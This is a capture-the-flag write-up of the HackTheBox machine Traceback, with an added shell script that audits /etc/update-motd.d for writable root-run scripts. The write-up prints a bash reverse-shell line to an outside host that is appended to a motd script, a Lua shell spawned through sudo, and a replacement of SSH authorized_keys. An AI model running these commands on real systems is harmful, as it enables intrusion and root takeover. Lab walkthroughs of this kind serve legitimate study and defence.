HackTheBox — Traceback

Summary

Traceback is an easy box with IP 10.10.10.181.

Enumeration

Nmap

Web Enum

I tried to take a look at the source

From the hint, I searched for Xh4H web shells and found some shells

I dumped all the shell names into a txt file and used gobuster

I used admin:admin credentials to login

After that I deleted the default authorized_keys and uploaded my own

Let’s login now

Get user sysadmin

$ sudo -l
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit

After searching about Lua,
create a Lua command shell:

echo "local t = os.execute('/bin/sh')" > rev.lua

Execute rev.lua as sysadmin without a password to get the user:

sudo -u sysadmin /home/sysadmin/luvit rev.lua

Gain user flag!

Privilege Escalation

Enumerating the box using linpeas, we see that we can modify files inside /etc/update-motd.d

I found this article that talks about motd

I added a bash rev shell to 00-header

echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.xx.xx/4334 0>&1'" >> /etc/update-motd.d/00-header

Listen on port 4334 and ssh to the box from another terminal

Now if we ssh as webadmin, we should get root

root@strike:~# ssh -i id_rsa webadmin@10.10.10.181
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land

8c221146c17c2a973a846f49xxxxxxxx


Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sat Aug 15 06:23:37 2020 from 10.10.14.53
webadmin@traceback:~$

Gain root flag!
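
As the defender's counterpart to the privilege escalation above, this added example (not part of the original write-up) audits a directory such as /etc/update-motd.d, whose scripts run as root at login, for entries a non-root user could modify. The function name audit_root_scripts, its output format and the reliance on GNU stat are assumptions of the example.

```shell
#!/bin/sh
# Added example (not from the write-up): audit a directory whose scripts are
# executed as root, such as /etc/update-motd.d (run by pam_motd at login).
# Requires GNU stat. POSIX ACLs are not inspected.
#
# Usage: audit_root_scripts /etc/update-motd.d
#
# audit_root_scripts DIR [EXPECTED_UID]
# Prints one finding per line. Exit status: 0 clean, 1 findings, 2 bad input.
audit_root_scripts() (
    dir=$1
    want_uid=${2:-0}          # assumption: everything here should be owned by root
    status=0
    [ -d "$dir" ] || { echo "not a directory: $dir" >&2; exit 2; }

    # Check the directory itself too: write access there allows replacing files.
    for f in "$dir" "$dir"/*; do
        [ -e "$f" ] || continue        # empty directory or dangling symlink
        uid=$(stat -L -c '%u' "$f")    # -L: judge the symlink target, not the link
        mode=$(stat -L -c '%a' "$f")
        if [ "$uid" != "$want_uid" ]; then
            echo "OWNER $f uid=$uid (expected $want_uid)"
            status=1
        fi
        # 022 = write bit for group and for others
        if [ $(( 0$mode & 022 )) -ne 0 ]; then
            echo "WRITABLE $f mode=$mode"
            status=1
        fi
    done
    exit "$status"
)
```

Any WRITABLE or OWNER line for this directory means a lower-privileged account may be able to run commands as root on the next login; tightening it to root ownership and mode 755 closes that path.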

If u learn anything useful from the write-up, respect me on HackTheBox

THX for ur time!

CTFer | Computer Science Student

Ahmed Samir